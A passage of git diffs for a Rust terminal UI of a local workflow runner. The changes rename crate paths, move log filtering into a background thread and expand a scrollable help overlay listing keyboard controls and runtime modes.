"Failed to redirect stderr when checking Podman availability.",
);
false
}
};
let is_podman_available = match wrkflw_utils::fd::with_stderr_to_null(
wrkflw_executor::podman::is_available,
) {
Ok(result) => result,
Err(_) => {
wrkflw_logging::debug(
"Failed to redirect stderr when checking Podman availability.",
);
false
}
};
if !is_podman_available {
app.logs
.push("Podman is not available. Using emulation mode instead.".to_string());
logging::warning("Podman is not available. Using emulation mode instead.");
wrkflw_logging::warning(
"Podman is not available. Using emulation mode instead.",
);
RuntimeType::Emulation
} else {
RuntimeType::Podman
}
}
RuntimeType::SecureEmulation => RuntimeType::SecureEmulation,
RuntimeType::Emulation => RuntimeType::Emulation,
};
@@ -487,21 +495,21 @@ pub fn start_next_workflow_execution(
Ok(validation_result) => {
// Create execution result based on validation
let status = if validation_result.is_valid {
executor::JobStatus::Success
wrkflw_executor::JobStatus::Success
} else {
executor::JobStatus::Failure
wrkflw_executor::JobStatus::Failure
};
// Create a synthetic job result for validation
let jobs = vec![executor::JobResult {
let jobs = vec![wrkflw_executor::JobResult {
name: "Validation".to_string(),
status,
steps: vec![executor::StepResult {
steps: vec![wrkflw_executor::StepResult {
name: "Validator".to_string(),
status: if validation_result.is_valid {
executor::StepStatus::Success
wrkflw_executor::StepStatus::Success
} else {
executor::StepStatus::Failure
wrkflw_executor::StepStatus::Failure
},
output: validation_result.issues.join("\n"),
}],
@@ -521,15 +529,15 @@ pub fn start_next_workflow_execution(
}
} else {
// Use safe FD redirection for execution
let config = executor::ExecutionConfig {
let config = wrkflw_executor::ExecutionConfig {
runtime_type,
verbose,
preserve_containers_on_failure,
};
let execution_result = utils::fd::with_stderr_to_null(|| {
let execution_result = wrkflw_utils::fd::with_stderr_to_null(|| {
futures::executor::block_on(async {
executor::execute_workflow(&workflow_path, config).await
wrkflw_executor::execute_workflow(&workflow_path, config).await
})
})
.map_err(|e| format!("Failed to redirect stderr during execution: {}", e))?;
@@ -546,7 +554,7 @@ pub fn start_next_workflow_execution(
// Only send if we get a valid result
if let Err(e) = tx_clone_inner.send((next_idx, result)) {
logging::error(&format!("Error sending execution result: {}", e));
wrkflw_logging::error(&format!("Error sending execution result: {}", e));
}
});
} else {
@@ -554,6 +562,6 @@ pub fn start_next_workflow_execution(
let timestamp = Local::now().format("%H:%M:%S").to_string();
app.logs
.push(format!("[{}] All workflows completed execution", timestamp));
logging::info("All workflows completed execution");
wrkflw_logging::info("All workflows completed execution");
}
}

View File

@@ -12,6 +12,7 @@
pub mod app;
pub mod components;
pub mod handlers;
pub mod log_processor;
pub mod models;
pub mod utils;
pub mod views;

View File

@@ -0,0 +1,305 @@
// Background log processor for asynchronous log filtering and formatting
use crate::models::LogFilterLevel;
use ratatui::{
style::{Color, Style},
text::{Line, Span},
widgets::{Cell, Row},
};
use std::sync::mpsc;
use std::thread;
use std::time::{Duration, Instant};
/// Processed log entry ready for rendering
#[derive(Debug, Clone)]
pub struct ProcessedLogEntry {
pub timestamp: String,
pub log_type: String,
pub log_style: Style,
pub content_spans: Vec<Span<'static>>,
}
impl ProcessedLogEntry {
/// Convert to a table row for rendering
pub fn to_row(&self) -> Row<'static> {
Row::new(vec![
Cell::from(self.timestamp.clone()),
Cell::from(self.log_type.clone()).style(self.log_style),
Cell::from(Line::from(self.content_spans.clone())),
])
}
}
/// Request to update log processing parameters
#[derive(Debug, Clone)]
pub struct LogProcessingRequest {
pub search_query: String,
pub filter_level: Option<LogFilterLevel>,
pub app_logs: Vec<String>, // Complete app logs
pub app_logs_count: usize, // To detect changes in app logs
pub system_logs_count: usize, // To detect changes in system logs
}
/// Response with processed logs
#[derive(Debug, Clone)]
pub struct LogProcessingResponse {
pub processed_logs: Vec<ProcessedLogEntry>,
pub total_log_count: usize,
pub filtered_count: usize,
pub search_matches: Vec<usize>, // Indices of logs that match search
}
/// Background log processor
pub struct LogProcessor {
request_tx: mpsc::Sender<LogProcessingRequest>,
response_rx: mpsc::Receiver<LogProcessingResponse>,
_worker_handle: thread::JoinHandle<()>,
}
impl LogProcessor {
/// Create a new log processor with a background worker thread
pub fn new() -> Self {
let (request_tx, request_rx) = mpsc::channel::<LogProcessingRequest>();
let (response_tx, response_rx) = mpsc::channel::<LogProcessingResponse>();
let worker_handle = thread::spawn(move || {
Self::worker_loop(request_rx, response_tx);
});
Self {
request_tx,
response_rx,
_worker_handle: worker_handle,
}
}
/// Send a processing request (non-blocking)
pub fn request_update(
&self,
request: LogProcessingRequest,
) -> Result<(), mpsc::SendError<LogProcessingRequest>> {
self.request_tx.send(request)
}
/// Try to get the latest processed logs (non-blocking)
pub fn try_get_update(&self) -> Option<LogProcessingResponse> {
self.response_rx.try_recv().ok()
}
/// Background worker loop
fn worker_loop(
request_rx: mpsc::Receiver<LogProcessingRequest>,
response_tx: mpsc::Sender<LogProcessingResponse>,
) {
let mut last_request: Option<LogProcessingRequest> = None;
let mut last_processed_time = Instant::now();
let mut cached_logs: Vec<String> = Vec::new();
let mut cached_app_logs_count = 0;
let mut cached_system_logs_count = 0;
loop {
// Check for new requests with a timeout to allow periodic processing
let request = match request_rx.recv_timeout(Duration::from_millis(100)) {
Ok(req) => Some(req),
Err(mpsc::RecvTimeoutError::Timeout) => None,
Err(mpsc::RecvTimeoutError::Disconnected) => break,
};
// Update request if we received one
if let Some(req) = request {
last_request = Some(req);
}
// Process if we have a request and enough time has passed since last processing
if let Some(ref req) = last_request {
let should_process = last_processed_time.elapsed() > Duration::from_millis(50)
&& (cached_app_logs_count != req.app_logs_count
|| cached_system_logs_count != req.system_logs_count
|| cached_logs.is_empty());
if should_process {
// Refresh log cache if log counts changed
if cached_app_logs_count != req.app_logs_count
|| cached_system_logs_count != req.system_logs_count
|| cached_logs.is_empty()
{
cached_logs = Self::get_combined_logs(&req.app_logs);
cached_app_logs_count = req.app_logs_count;
cached_system_logs_count = req.system_logs_count;
}
let response = Self::process_logs(&cached_logs, req);
if response_tx.send(response).is_err() {
break; // Receiver disconnected
}
last_processed_time = Instant::now();
}
}
}
}
/// Get combined app and system logs
fn get_combined_logs(app_logs: &[String]) -> Vec<String> {
let mut all_logs = Vec::new();
// Add app logs
for log in app_logs {
all_logs.push(log.clone());
}
// Add system logs
for log in wrkflw_logging::get_logs() {
all_logs.push(log.clone());
}
all_logs
}
/// Process logs according to search and filter criteria
fn process_logs(all_logs: &[String], request: &LogProcessingRequest) -> LogProcessingResponse {
// Filter logs based on search query and filter level
let mut filtered_logs = Vec::new();
let mut search_matches = Vec::new();
for (idx, log) in all_logs.iter().enumerate() {
let passes_filter = match &request.filter_level {
None => true,
Some(level) => level.matches(log),
};
let matches_search = if request.search_query.is_empty() {
true
} else {
log.to_lowercase()
.contains(&request.search_query.to_lowercase())
};
if passes_filter && matches_search {
filtered_logs.push((idx, log));
if matches_search && !request.search_query.is_empty() {
search_matches.push(filtered_logs.len() - 1);
}
}
}
// Process filtered logs into display format
let processed_logs: Vec<ProcessedLogEntry> = filtered_logs
.iter()
.map(|(_, log_line)| Self::process_log_entry(log_line, &request.search_query))
.collect();
LogProcessingResponse {
processed_logs,
total_log_count: all_logs.len(),
filtered_count: filtered_logs.len(),
search_matches,
}
}
/// Process a single log entry into display format
fn process_log_entry(log_line: &str, search_query: &str) -> ProcessedLogEntry {
// Extract timestamp from log format [HH:MM:SS]
let timestamp = if log_line.starts_with('[') && log_line.contains(']') {
let end = log_line.find(']').unwrap_or(0);
if end > 1 {
log_line[1..end].to_string()
} else {
"??:??:??".to_string()
}
} else {
"??:??:??".to_string()
};
// Determine log type and style
let (log_type, log_style) =
if log_line.contains("Error") || log_line.contains("error") || log_line.contains("")
{
("ERROR", Style::default().fg(Color::Red))
} else if log_line.contains("Warning")
|| log_line.contains("warning")
|| log_line.contains("⚠️")
{
("WARN", Style::default().fg(Color::Yellow))
} else if log_line.contains("Success")
|| log_line.contains("success")
|| log_line.contains("")
{
("SUCCESS", Style::default().fg(Color::Green))
} else if log_line.contains("Running")
|| log_line.contains("running")
|| log_line.contains("")
{
("INFO", Style::default().fg(Color::Cyan))
} else if log_line.contains("Triggering") || log_line.contains("triggered") {
("TRIG", Style::default().fg(Color::Magenta))
} else {
("INFO", Style::default().fg(Color::Gray))
};
// Extract content after timestamp
let content = if log_line.starts_with('[') && log_line.contains(']') {
let start = log_line.find(']').unwrap_or(0) + 1;
log_line[start..].trim()
} else {
log_line
};
// Create content spans with search highlighting
let content_spans = if !search_query.is_empty() {
Self::highlight_search_matches(content, search_query)
} else {
vec![Span::raw(content.to_string())]
};
ProcessedLogEntry {
timestamp,
log_type: log_type.to_string(),
log_style,
content_spans,
}
}
/// Highlight search matches in content
fn highlight_search_matches(content: &str, search_query: &str) -> Vec<Span<'static>> {
let mut spans = Vec::new();
let lowercase_content = content.to_lowercase();
let lowercase_query = search_query.to_lowercase();
if lowercase_content.contains(&lowercase_query) {
let mut last_idx = 0;
while let Some(idx) = lowercase_content[last_idx..].find(&lowercase_query) {
let real_idx = last_idx + idx;
// Add text before match
if real_idx > last_idx {
spans.push(Span::raw(content[last_idx..real_idx].to_string()));
}
// Add matched text with highlight
let match_end = real_idx + search_query.len();
spans.push(Span::styled(
content[real_idx..match_end].to_string(),
Style::default().bg(Color::Yellow).fg(Color::Black),
));
last_idx = match_end;
}
// Add remaining text after last match
if last_idx < content.len() {
spans.push(Span::raw(content[last_idx..].to_string()));
}
} else {
spans.push(Span::raw(content.to_string()));
}
spans
}
}
impl Default for LogProcessor {
fn default() -> Self {
Self::new()
}
}

View File

@@ -1,10 +1,10 @@
// UI Models for wrkflw
use chrono::Local;
use executor::{JobStatus, StepStatus};
use std::path::PathBuf;
use wrkflw_executor::{JobStatus, StepStatus};
/// Type alias for the complex execution result type
pub type ExecutionResultMsg = (usize, Result<(Vec<executor::JobResult>, ()), String>);
pub type ExecutionResultMsg = (usize, Result<(Vec<wrkflw_executor::JobResult>, ()), String>);
/// Represents an individual workflow file
pub struct Workflow {
@@ -50,6 +50,7 @@ pub struct StepExecution {
}
/// Log filter levels
#[derive(Debug, Clone, PartialEq)]
pub enum LogFilterLevel {
Info,
Warning,

View File

@@ -1,7 +1,7 @@
// UI utilities
use crate::models::{Workflow, WorkflowStatus};
use std::path::{Path, PathBuf};
use utils::is_workflow_file;
use wrkflw_utils::is_workflow_file;
/// Find and load all workflow files in a directory
pub fn load_workflows(dir_path: &Path) -> Vec<Workflow> {

View File

@@ -145,15 +145,17 @@ pub fn render_execution_tab(
.iter()
.map(|job| {
let status_symbol = match job.status {
executor::JobStatus::Success => "",
executor::JobStatus::Failure => "",
executor::JobStatus::Skipped => "",
wrkflw_executor::JobStatus::Success => "",
wrkflw_executor::JobStatus::Failure => "",
wrkflw_executor::JobStatus::Skipped => "",
};
let status_style = match job.status {
executor::JobStatus::Success => Style::default().fg(Color::Green),
executor::JobStatus::Failure => Style::default().fg(Color::Red),
executor::JobStatus::Skipped => Style::default().fg(Color::Gray),
wrkflw_executor::JobStatus::Success => {
Style::default().fg(Color::Green)
}
wrkflw_executor::JobStatus::Failure => Style::default().fg(Color::Red),
wrkflw_executor::JobStatus::Skipped => Style::default().fg(Color::Gray),
};
// Count completed and total steps
@@ -162,8 +164,8 @@ pub fn render_execution_tab(
.steps
.iter()
.filter(|s| {
s.status == executor::StepStatus::Success
|| s.status == executor::StepStatus::Failure
s.status == wrkflw_executor::StepStatus::Success
|| s.status == wrkflw_executor::StepStatus::Failure
})
.count();

View File

@@ -1,7 +1,7 @@
// Help overlay rendering
use ratatui::{
backend::CrosstermBackend,
layout::Rect,
layout::{Constraint, Direction, Layout, Rect},
style::{Color, Modifier, Style},
text::{Line, Span},
widgets::{Block, BorderType, Borders, Paragraph, Wrap},
@@ -9,11 +9,22 @@ use ratatui::{
};
use std::io;
// Render the help tab
pub fn render_help_tab(f: &mut Frame<CrosstermBackend<io::Stdout>>, area: Rect) {
let help_text = vec![
// Render the help tab with scroll support
pub fn render_help_content(
f: &mut Frame<CrosstermBackend<io::Stdout>>,
area: Rect,
scroll_offset: usize,
) {
// Split the area into columns for better organization
let chunks = Layout::default()
.direction(Direction::Horizontal)
.constraints([Constraint::Percentage(50), Constraint::Percentage(50)].as_ref())
.split(area);
// Left column content
let left_help_text = vec![
Line::from(Span::styled(
"Keyboard Controls",
"🗂 NAVIGATION",
Style::default()
.fg(Color::Cyan)
.add_modifier(Modifier::BOLD),
@@ -21,35 +32,391 @@ pub fn render_help_tab(f: &mut Frame<CrosstermBackend<io::Stdout>>, area: Rect)
Line::from(""),
Line::from(vec![
Span::styled(
"Tab",
"Tab / Shift+Tab",
Style::default()
.fg(Color::Yellow)
.add_modifier(Modifier::BOLD),
),
Span::raw(" - Switch between tabs"),
]),
// More help text would follow...
Line::from(vec![
Span::styled(
"1-4 / w,x,l,h",
Style::default()
.fg(Color::Yellow)
.add_modifier(Modifier::BOLD),
),
Span::raw(" - Jump to specific tab"),
]),
Line::from(vec![
Span::styled(
"↑/↓ or k/j",
Style::default()
.fg(Color::Yellow)
.add_modifier(Modifier::BOLD),
),
Span::raw(" - Navigate lists"),
]),
Line::from(vec![
Span::styled(
"Enter",
Style::default()
.fg(Color::Yellow)
.add_modifier(Modifier::BOLD),
),
Span::raw(" - Select/View details"),
]),
Line::from(vec![
Span::styled(
"Esc",
Style::default()
.fg(Color::Yellow)
.add_modifier(Modifier::BOLD),
),
Span::raw(" - Back/Exit help"),
]),
Line::from(""),
Line::from(Span::styled(
"🚀 WORKFLOW MANAGEMENT",
Style::default()
.fg(Color::Green)
.add_modifier(Modifier::BOLD),
)),
Line::from(""),
Line::from(vec![
Span::styled(
"Space",
Style::default()
.fg(Color::Yellow)
.add_modifier(Modifier::BOLD),
),
Span::raw(" - Toggle workflow selection"),
]),
Line::from(vec![
Span::styled(
"r",
Style::default()
.fg(Color::Yellow)
.add_modifier(Modifier::BOLD),
),
Span::raw(" - Run selected workflows"),
]),
Line::from(vec![
Span::styled(
"a",
Style::default()
.fg(Color::Yellow)
.add_modifier(Modifier::BOLD),
),
Span::raw(" - Select all workflows"),
]),
Line::from(vec![
Span::styled(
"n",
Style::default()
.fg(Color::Yellow)
.add_modifier(Modifier::BOLD),
),
Span::raw(" - Deselect all workflows"),
]),
Line::from(vec![
Span::styled(
"Shift+R",
Style::default()
.fg(Color::Yellow)
.add_modifier(Modifier::BOLD),
),
Span::raw(" - Reset workflow status"),
]),
Line::from(vec![
Span::styled(
"t",
Style::default()
.fg(Color::Yellow)
.add_modifier(Modifier::BOLD),
),
Span::raw(" - Trigger remote workflow"),
]),
Line::from(""),
Line::from(Span::styled(
"🔧 EXECUTION MODES",
Style::default()
.fg(Color::Magenta)
.add_modifier(Modifier::BOLD),
)),
Line::from(""),
Line::from(vec![
Span::styled(
"e",
Style::default()
.fg(Color::Yellow)
.add_modifier(Modifier::BOLD),
),
Span::raw(" - Toggle emulation mode"),
]),
Line::from(vec![
Span::styled(
"v",
Style::default()
.fg(Color::Yellow)
.add_modifier(Modifier::BOLD),
),
Span::raw(" - Toggle validation mode"),
]),
Line::from(""),
Line::from(vec![Span::styled(
"Runtime Modes:",
Style::default()
.fg(Color::White)
.add_modifier(Modifier::BOLD),
)]),
Line::from(vec![
Span::raw(""),
Span::styled("Docker", Style::default().fg(Color::Blue)),
Span::raw(" - Container isolation (default)"),
]),
Line::from(vec![
Span::raw(""),
Span::styled("Podman", Style::default().fg(Color::Blue)),
Span::raw(" - Rootless containers"),
]),
Line::from(vec![
Span::raw(""),
Span::styled("Emulation", Style::default().fg(Color::Red)),
Span::raw(" - Process mode (UNSAFE)"),
]),
Line::from(vec![
Span::raw(""),
Span::styled("Secure Emulation", Style::default().fg(Color::Yellow)),
Span::raw(" - Sandboxed processes"),
]),
];
let help_widget = Paragraph::new(help_text)
// Right column content
let right_help_text = vec![
Line::from(Span::styled(
"📄 LOGS & SEARCH",
Style::default()
.fg(Color::Blue)
.add_modifier(Modifier::BOLD),
)),
Line::from(""),
Line::from(vec![
Span::styled(
"s",
Style::default()
.fg(Color::Yellow)
.add_modifier(Modifier::BOLD),
),
Span::raw(" - Toggle log search"),
]),
Line::from(vec![
Span::styled(
"f",
Style::default()
.fg(Color::Yellow)
.add_modifier(Modifier::BOLD),
),
Span::raw(" - Toggle log filter"),
]),
Line::from(vec![
Span::styled(
"c",
Style::default()
.fg(Color::Yellow)
.add_modifier(Modifier::BOLD),
),
Span::raw(" - Clear search & filter"),
]),
Line::from(vec![
Span::styled(
"n",
Style::default()
.fg(Color::Yellow)
.add_modifier(Modifier::BOLD),
),
Span::raw(" - Next search match"),
]),
Line::from(vec![
Span::styled(
"↑/↓",
Style::default()
.fg(Color::Yellow)
.add_modifier(Modifier::BOLD),
),
Span::raw(" - Scroll logs/Navigate"),
]),
Line::from(""),
Line::from(Span::styled(
" TAB OVERVIEW",
Style::default()
.fg(Color::White)
.add_modifier(Modifier::BOLD),
)),
Line::from(""),
Line::from(vec![
Span::styled(
"1. Workflows",
Style::default()
.fg(Color::Cyan)
.add_modifier(Modifier::BOLD),
),
Span::raw(" - Browse & select workflows"),
]),
Line::from(vec![Span::raw(" • View workflow files")]),
Line::from(vec![Span::raw(" • Select multiple for batch execution")]),
Line::from(vec![Span::raw(" • Trigger remote workflows")]),
Line::from(""),
Line::from(vec![
Span::styled(
"2. Execution",
Style::default()
.fg(Color::Green)
.add_modifier(Modifier::BOLD),
),
Span::raw(" - Monitor job progress"),
]),
Line::from(vec![Span::raw(" • View job status and details")]),
Line::from(vec![Span::raw(" • Enter job details with Enter")]),
Line::from(vec![Span::raw(" • Navigate step execution")]),
Line::from(""),
Line::from(vec![
Span::styled(
"3. Logs",
Style::default()
.fg(Color::Blue)
.add_modifier(Modifier::BOLD),
),
Span::raw(" - View execution logs"),
]),
Line::from(vec![Span::raw(" • Search and filter logs")]),
Line::from(vec![Span::raw(" • Real-time log streaming")]),
Line::from(vec![Span::raw(" • Navigate search results")]),
Line::from(""),
Line::from(vec![
Span::styled(
"4. Help",
Style::default()
.fg(Color::Yellow)
.add_modifier(Modifier::BOLD),
),
Span::raw(" - This comprehensive guide"),
]),
Line::from(""),
Line::from(Span::styled(
"🎯 QUICK ACTIONS",
Style::default().fg(Color::Red).add_modifier(Modifier::BOLD),
)),
Line::from(""),
Line::from(vec![
Span::styled(
"?",
Style::default()
.fg(Color::Yellow)
.add_modifier(Modifier::BOLD),
),
Span::raw(" - Toggle help overlay"),
]),
Line::from(vec![
Span::styled(
"q",
Style::default()
.fg(Color::Yellow)
.add_modifier(Modifier::BOLD),
),
Span::raw(" - Quit application"),
]),
Line::from(""),
Line::from(Span::styled(
"💡 TIPS",
Style::default()
.fg(Color::Yellow)
.add_modifier(Modifier::BOLD),
)),
Line::from(""),
Line::from(vec![
Span::raw("• Use "),
Span::styled("emulation mode", Style::default().fg(Color::Red)),
Span::raw(" when containers"),
]),
Line::from(vec![Span::raw(" are unavailable or for quick testing")]),
Line::from(""),
Line::from(vec![
Span::raw(""),
Span::styled("Secure emulation", Style::default().fg(Color::Yellow)),
Span::raw(" provides sandboxing"),
]),
Line::from(vec![Span::raw(" for untrusted workflows")]),
Line::from(""),
Line::from(vec![
Span::raw("• Use "),
Span::styled("validation mode", Style::default().fg(Color::Green)),
Span::raw(" to check"),
]),
Line::from(vec![Span::raw(" workflows without execution")]),
Line::from(""),
Line::from(vec![
Span::raw(""),
Span::styled("Preserve containers", Style::default().fg(Color::Blue)),
Span::raw(" on failure"),
]),
Line::from(vec![Span::raw(" for debugging (Docker/Podman only)")]),
];
// Apply scroll offset to the content
let left_help_text = if scroll_offset < left_help_text.len() {
left_help_text.into_iter().skip(scroll_offset).collect()
} else {
vec![Line::from("")]
};
let right_help_text = if scroll_offset < right_help_text.len() {
right_help_text.into_iter().skip(scroll_offset).collect()
} else {
vec![Line::from("")]
};
// Render left column
let left_widget = Paragraph::new(left_help_text)
.block(
Block::default()
.borders(Borders::ALL)
.border_type(BorderType::Rounded)
.title(Span::styled(" Help ", Style::default().fg(Color::Yellow))),
.title(Span::styled(
" WRKFLW Help - Controls & Features ",
Style::default()
.fg(Color::Yellow)
.add_modifier(Modifier::BOLD),
)),
)
.wrap(Wrap { trim: true });
f.render_widget(help_widget, area);
// Render right column
let right_widget = Paragraph::new(right_help_text)
.block(
Block::default()
.borders(Borders::ALL)
.border_type(BorderType::Rounded)
.title(Span::styled(
" Interface Guide & Tips ",
Style::default()
.fg(Color::Cyan)
.add_modifier(Modifier::BOLD),
)),
)
.wrap(Wrap { trim: true });
f.render_widget(left_widget, chunks[0]);
f.render_widget(right_widget, chunks[1]);
}
// Render a help overlay
pub fn render_help_overlay(f: &mut Frame<CrosstermBackend<io::Stdout>>) {
pub fn render_help_overlay(f: &mut Frame<CrosstermBackend<io::Stdout>>, scroll_offset: usize) {
let size = f.size();
// Create a slightly smaller centered modal
let width = size.width.min(60);
let height = size.height.min(20);
// Create a larger centered modal to accommodate comprehensive help content
let width = (size.width * 9 / 10).min(120); // Use 90% of width, max 120 chars
let height = (size.height * 9 / 10).min(40); // Use 90% of height, max 40 lines
let x = (size.width - width) / 2;
let y = (size.height - height) / 2;
@@ -60,10 +427,32 @@ pub fn render_help_overlay(f: &mut Frame<CrosstermBackend<io::Stdout>>) {
height,
};
// Create a clear background
// Create a semi-transparent dark background for better visibility
let clear = Block::default().style(Style::default().bg(Color::Black));
f.render_widget(clear, size);
// Render the help content
render_help_tab(f, help_area);
// Add a border around the entire overlay for better visual separation
let overlay_block = Block::default()
.borders(Borders::ALL)
.border_type(BorderType::Double)
.style(Style::default().bg(Color::Black).fg(Color::White))
.title(Span::styled(
" Press ? or Esc to close help ",
Style::default()
.fg(Color::Gray)
.add_modifier(Modifier::ITALIC),
));
f.render_widget(overlay_block, help_area);
// Create inner area for content
let inner_area = Rect {
x: help_area.x + 1,
y: help_area.y + 1,
width: help_area.width.saturating_sub(2),
height: help_area.height.saturating_sub(2),
};
// Render the help content with scroll support
render_help_content(f, inner_area, scroll_offset);
}

View File

@@ -46,15 +46,15 @@ pub fn render_job_detail_view(
// Job title section
let status_text = match job.status {
executor::JobStatus::Success => "Success",
executor::JobStatus::Failure => "Failed",
executor::JobStatus::Skipped => "Skipped",
wrkflw_executor::JobStatus::Success => "Success",
wrkflw_executor::JobStatus::Failure => "Failed",
wrkflw_executor::JobStatus::Skipped => "Skipped",
};
let status_style = match job.status {
executor::JobStatus::Success => Style::default().fg(Color::Green),
executor::JobStatus::Failure => Style::default().fg(Color::Red),
executor::JobStatus::Skipped => Style::default().fg(Color::Yellow),
wrkflw_executor::JobStatus::Success => Style::default().fg(Color::Green),
wrkflw_executor::JobStatus::Failure => Style::default().fg(Color::Red),
wrkflw_executor::JobStatus::Skipped => Style::default().fg(Color::Yellow),
};
let job_title = Paragraph::new(vec![
@@ -101,15 +101,19 @@ pub fn render_job_detail_view(
let rows = job.steps.iter().map(|step| {
let status_symbol = match step.status {
executor::StepStatus::Success => "",
executor::StepStatus::Failure => "",
executor::StepStatus::Skipped => "",
wrkflw_executor::StepStatus::Success => "",
wrkflw_executor::StepStatus::Failure => "",
wrkflw_executor::StepStatus::Skipped => "",
};
let status_style = match step.status {
executor::StepStatus::Success => Style::default().fg(Color::Green),
executor::StepStatus::Failure => Style::default().fg(Color::Red),
executor::StepStatus::Skipped => Style::default().fg(Color::Gray),
wrkflw_executor::StepStatus::Success => {
Style::default().fg(Color::Green)
}
wrkflw_executor::StepStatus::Failure => Style::default().fg(Color::Red),
wrkflw_executor::StepStatus::Skipped => {
Style::default().fg(Color::Gray)
}
};
Row::new(vec![
@@ -147,15 +151,21 @@ pub fn render_job_detail_view(
// Show step output with proper styling
let status_text = match step.status {
executor::StepStatus::Success => "Success",
executor::StepStatus::Failure => "Failed",
executor::StepStatus::Skipped => "Skipped",
wrkflw_executor::StepStatus::Success => "Success",
wrkflw_executor::StepStatus::Failure => "Failed",
wrkflw_executor::StepStatus::Skipped => "Skipped",
};
let status_style = match step.status {
executor::StepStatus::Success => Style::default().fg(Color::Green),
executor::StepStatus::Failure => Style::default().fg(Color::Red),
executor::StepStatus::Skipped => Style::default().fg(Color::Yellow),
wrkflw_executor::StepStatus::Success => {
Style::default().fg(Color::Green)
}
wrkflw_executor::StepStatus::Failure => {
Style::default().fg(Color::Red)
}
wrkflw_executor::StepStatus::Skipped => {
Style::default().fg(Color::Yellow)
}
};
let mut output_text = step.output.clone();

View File

@@ -140,45 +140,8 @@ pub fn render_logs_tab(f: &mut Frame<CrosstermBackend<io::Stdout>>, app: &App, a
f.render_widget(search_block, chunks[1]);
}
// Combine application logs with system logs
let mut all_logs = Vec::new();
// Now all logs should have timestamps in the format [HH:MM:SS]
// Process app logs
for log in &app.logs {
all_logs.push(log.clone());
}
// Process system logs
for log in logging::get_logs() {
all_logs.push(log.clone());
}
// Filter logs based on search query and filter level
let filtered_logs = if !app.log_search_query.is_empty() || app.log_filter_level.is_some() {
all_logs
.iter()
.filter(|log| {
let passes_filter = match &app.log_filter_level {
None => true,
Some(level) => level.matches(log),
};
let matches_search = if app.log_search_query.is_empty() {
true
} else {
log.to_lowercase()
.contains(&app.log_search_query.to_lowercase())
};
passes_filter && matches_search
})
.cloned()
.collect::<Vec<String>>()
} else {
all_logs.clone() // Clone to avoid moving all_logs
};
// Use processed logs from background thread instead of processing on every frame
let filtered_logs = &app.processed_logs;
// Create a table for logs for better organization
let header_cells = ["Time", "Type", "Message"]
@@ -189,109 +152,10 @@ pub fn render_logs_tab(f: &mut Frame<CrosstermBackend<io::Stdout>>, app: &App, a
.style(Style::default().add_modifier(Modifier::BOLD))
.height(1);
let rows = filtered_logs.iter().map(|log_line| {
// Parse log line to extract timestamp, type and message
// Extract timestamp from log format [HH:MM:SS]
let timestamp = if log_line.starts_with('[') && log_line.contains(']') {
let end = log_line.find(']').unwrap_or(0);
if end > 1 {
log_line[1..end].to_string()
} else {
"??:??:??".to_string() // Show placeholder for malformed logs
}
} else {
"??:??:??".to_string() // Show placeholder for malformed logs
};
let (log_type, log_style, _) =
if log_line.contains("Error") || log_line.contains("error") || log_line.contains("")
{
("ERROR", Style::default().fg(Color::Red), log_line.as_str())
} else if log_line.contains("Warning")
|| log_line.contains("warning")
|| log_line.contains("⚠️")
{
(
"WARN",
Style::default().fg(Color::Yellow),
log_line.as_str(),
)
} else if log_line.contains("Success")
|| log_line.contains("success")
|| log_line.contains("")
{
(
"SUCCESS",
Style::default().fg(Color::Green),
log_line.as_str(),
)
} else if log_line.contains("Running")
|| log_line.contains("running")
|| log_line.contains("")
{
("INFO", Style::default().fg(Color::Cyan), log_line.as_str())
} else if log_line.contains("Triggering") || log_line.contains("triggered") {
(
"TRIG",
Style::default().fg(Color::Magenta),
log_line.as_str(),
)
} else {
("INFO", Style::default().fg(Color::Gray), log_line.as_str())
};
// Extract content after timestamp
let content = if log_line.starts_with('[') && log_line.contains(']') {
let start = log_line.find(']').unwrap_or(0) + 1;
log_line[start..].trim()
} else {
log_line.as_str()
};
// Highlight search matches in content if search is active
let mut content_spans = Vec::new();
if !app.log_search_query.is_empty() {
let lowercase_content = content.to_lowercase();
let lowercase_query = app.log_search_query.to_lowercase();
if lowercase_content.contains(&lowercase_query) {
let mut last_idx = 0;
while let Some(idx) = lowercase_content[last_idx..].find(&lowercase_query) {
let real_idx = last_idx + idx;
// Add text before match
if real_idx > last_idx {
content_spans.push(Span::raw(content[last_idx..real_idx].to_string()));
}
// Add matched text with highlight
let match_end = real_idx + app.log_search_query.len();
content_spans.push(Span::styled(
content[real_idx..match_end].to_string(),
Style::default().bg(Color::Yellow).fg(Color::Black),
));
last_idx = match_end;
}
// Add remaining text after last match
if last_idx < content.len() {
content_spans.push(Span::raw(content[last_idx..].to_string()));
}
} else {
content_spans.push(Span::raw(content));
}
} else {
content_spans.push(Span::raw(content));
}
Row::new(vec![
Cell::from(timestamp),
Cell::from(log_type).style(log_style),
Cell::from(Line::from(content_spans)),
])
});
// Convert processed logs to table rows - this is now very fast since logs are pre-processed
let rows = filtered_logs
.iter()
.map(|processed_log| processed_log.to_row());
let content_idx = if show_search_bar { 2 } else { 1 };

View File

@@ -15,7 +15,7 @@ use std::io;
pub fn render_ui(f: &mut Frame<CrosstermBackend<io::Stdout>>, app: &mut App) {
// Check if help should be shown as an overlay
if app.show_help {
help_overlay::render_help_overlay(f);
help_overlay::render_help_overlay(f, app.help_scroll);
return;
}
@@ -48,7 +48,7 @@ pub fn render_ui(f: &mut Frame<CrosstermBackend<io::Stdout>>, app: &mut App) {
}
}
2 => logs_tab::render_logs_tab(f, app, main_chunks[1]),
3 => help_overlay::render_help_tab(f, main_chunks[1]),
3 => help_overlay::render_help_content(f, main_chunks[1], app.help_scroll),
_ => {}
}

View File

@@ -1,6 +1,5 @@
// Status bar rendering
use crate::app::App;
use executor::RuntimeType;
use ratatui::{
backend::CrosstermBackend,
layout::{Alignment, Rect},
@@ -10,6 +9,7 @@ use ratatui::{
Frame,
};
use std::io;
use wrkflw_executor::RuntimeType;
// Render the status bar
pub fn render_status_bar(f: &mut Frame<CrosstermBackend<io::Stdout>>, app: &App, area: Rect) {
@@ -41,7 +41,8 @@ pub fn render_status_bar(f: &mut Frame<CrosstermBackend<io::Stdout>>, app: &App,
.bg(match app.runtime_type {
RuntimeType::Docker => Color::Blue,
RuntimeType::Podman => Color::Cyan,
RuntimeType::Emulation => Color::Magenta,
RuntimeType::SecureEmulation => Color::Green,
RuntimeType::Emulation => Color::Red,
})
.fg(Color::White),
));
@@ -50,16 +51,17 @@ pub fn render_status_bar(f: &mut Frame<CrosstermBackend<io::Stdout>>, app: &App,
match app.runtime_type {
RuntimeType::Docker => {
// Check Docker silently using safe FD redirection
let is_docker_available =
match utils::fd::with_stderr_to_null(executor::docker::is_available) {
Ok(result) => result,
